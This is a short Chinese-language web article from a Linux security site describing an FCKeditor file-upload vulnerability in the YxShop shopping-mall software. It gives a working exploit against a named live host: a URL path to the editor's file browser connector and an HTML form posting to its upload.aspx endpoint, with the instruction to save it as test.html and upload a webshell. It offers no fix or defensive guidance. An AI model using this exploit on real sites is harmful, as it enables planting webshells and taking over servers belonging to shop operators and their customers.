Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

无线路由器886N 无线路由器886N千兆版
会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

YxShop易想购物商城fckeditor上传漏洞

日期:2011-07-22 点击:213 来源: 未知 分享至:

这套程序用的人还是挺多的,公布的漏洞也少,但是fckeditor的漏洞很多。

这套程序用的还是比较老的版本fckeditor.可以直接上传webshell。连IIS

解析漏洞多省了。

测试如下:

http://www.tmdsb.com/controls/fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspx

要是connector.aspx被删的话。可用以下代码。

<form id="frmUpload" enctype="multipart/form-data" action="http://www.tmdsb.com/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

把上面代码保存成test.html就可以直接上传sehll了。


Tags: linux学习方法 repquota lndir linux lndir lndir命令
分享至:
最新图文资讯
1 2 3 4 5 6
相关文章列表:
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
推荐内容
最新文章
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史

Copyright © 2010-2015 Linux安全网 LinuxSo.Com, All Rights Reserved. 豫ICP备12027123号-1